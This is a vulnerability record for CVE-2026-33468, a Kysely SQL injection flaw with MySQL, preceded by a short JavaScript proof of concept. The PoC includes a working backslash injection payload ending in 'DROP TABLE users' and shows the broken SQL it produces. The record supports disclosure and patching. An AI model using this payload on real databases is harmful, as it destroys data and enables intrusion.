CVE-2026-33468

// Proof of Concept for CVE-2026-33468 // Demonstrating the bypass of sanitization using backslash function vulnerableSanitize(str) { // Kysely < 0.28.14 logic: escapes single quotes but ignores backslashes return "'" + str.replace(/'/g, "''") + "'"; } // Attacker input containing a backslash const payload = "\\'; DROP TABLE users; --"; const sanitized = vulnerableSanitize(payload); console.log("Sanitized SQL Fragment:", sanitized); // Resulting SQL in MySQL: // WHERE col = '\''; DROP TABLE users; --' // The backslash escapes the second quote, breaking out of the string literal.

{"cve": {"id": "CVE-2026-33468", "sourceIdentifier": "[email protected]", "published": "2026-03-26T17:16:41.007", "lastModified": "2026-03-31T21:24:51.107", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kysely is a type-safe TypeScript SQL query builder. Prior to version 0.28.14, Kysely's `DefaultQueryCompiler.sanitizeStringLiteral()` only escapes single quotes by doubling them (`'` → `''`) but does not escape backslashes. When used with the MySQL dialect (where `NO_BACKSLASH_ESCAPES` is OFF by default), an attacker can use a backslash to escape the trailing quote of a string literal, breaking out of the string context and injecting arbitrary SQL. This affects any code path that uses `ImmediateValueTransformer` to inline values — specifically `CreateIndexBuilder.where()` and `CreateViewBuilder.as()`. Version 0.28.14 contains a fix."}, {"lang": "es", "value": "Kysely es un constructor de consultas SQL de TypeScript con seguridad de tipos. Antes de la versión 0.28.14, `DefaultQueryCompiler.sanitizeStringLiteral()` de Kysely solo escapaba las comillas simples duplicándolas ('`'` ? `''`) pero no escapaba las barras invertidas. Cuando se usa con el dialecto de MySQL (donde `NO_BACKSLASH_ESCAPES` está DESACTIVADO por defecto), un atacante puede usar una barra invertida para escapar la comilla final de un literal de cadena, saliendo del contexto de la cadena e inyectando SQL arbitrario. Esto afecta a cualquier ruta de código que utilice `ImmediateValueTransformer` para incrustar valores — específicamente `CreateIndexBuilder.where()` y `CreateViewBuilder.as()`. La versión 0.28.14 contiene una corrección."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kysely:kysely:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "0.28.14", "matchCriteriaId": "030AB58C-2968-4A93-8C8D-84D7A571BB94"}]}]}], "references": [{"url": "https://github.com/kysely-org/kysely/security/advisories/GHSA-8cpq-38p9-67gx", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}